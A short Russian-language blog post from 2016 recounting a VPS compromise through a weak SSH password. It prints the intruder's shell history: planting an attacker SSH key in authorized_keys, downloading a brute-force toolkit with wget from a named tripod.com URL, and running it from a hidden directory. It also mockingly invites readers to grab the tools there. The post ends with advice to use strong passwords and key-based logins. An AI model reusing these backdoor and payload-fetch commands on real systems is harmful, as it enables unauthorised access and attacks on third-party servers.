Bruteforce-Bot

Posted: 2016-01-27 in IT, Security
Метки:, ,

Настраивая свою впс-ку, один клиент поставил слабый пароль на одну из учёток.

Что произошло дальше ?
Боты нащупали слабый пароль:
Accepted password for teamspeak from 185.56.80.177 port 60850 ssh2

зашли по SSH под логином teamspeak, и дальше сделали простую вещь:

$ cat /home/teamspeak/.bash_history

mkdir .ssh
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAnhdLIoPB1q8Tn2LUsH7edJG7XwaJJ6cjmo3s+GRi\
ViLvNQIHl016+XIUVAL3Y/R5Irhxif88nymSBHgqBdmXtoNxNsdn6PBAPMH9Vx5XJ8Tc\
ELZQ9VW9Q4HfXptrP8Pm+LIya8pn6qhxtFnF3J5fGpfjnWhK3D439rq84l\
ygavU= Master IcS has arrived" >> authorized_keys
chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
passwd
php -v
sendmail
php -v
cd .ssh
ls
wget csmioveni.tripod.com//sshd.tgz
tar xvf sshd.tgz
cd .vmware-root/
ls
./start 213
ls

Обломившись с рутом и отсутствием php, херакеры решили немного с этой машины побрутить чужие сервера.

Пос0ны, налетай на csmioveni.tripod.com//sshd.tgz , к0чай прЕватные брутф0рсеры =)
В архиве оказался каталог .vmware-root, в нём — пара скомпиленных бинарей для брутфорса других серверов, словарик паролей и логинов.

Так что настраивая сервер, лучше сразу ставить нормальные пароли и делать авторизацию по ключам.

Реклама

Обсуждение закрыто.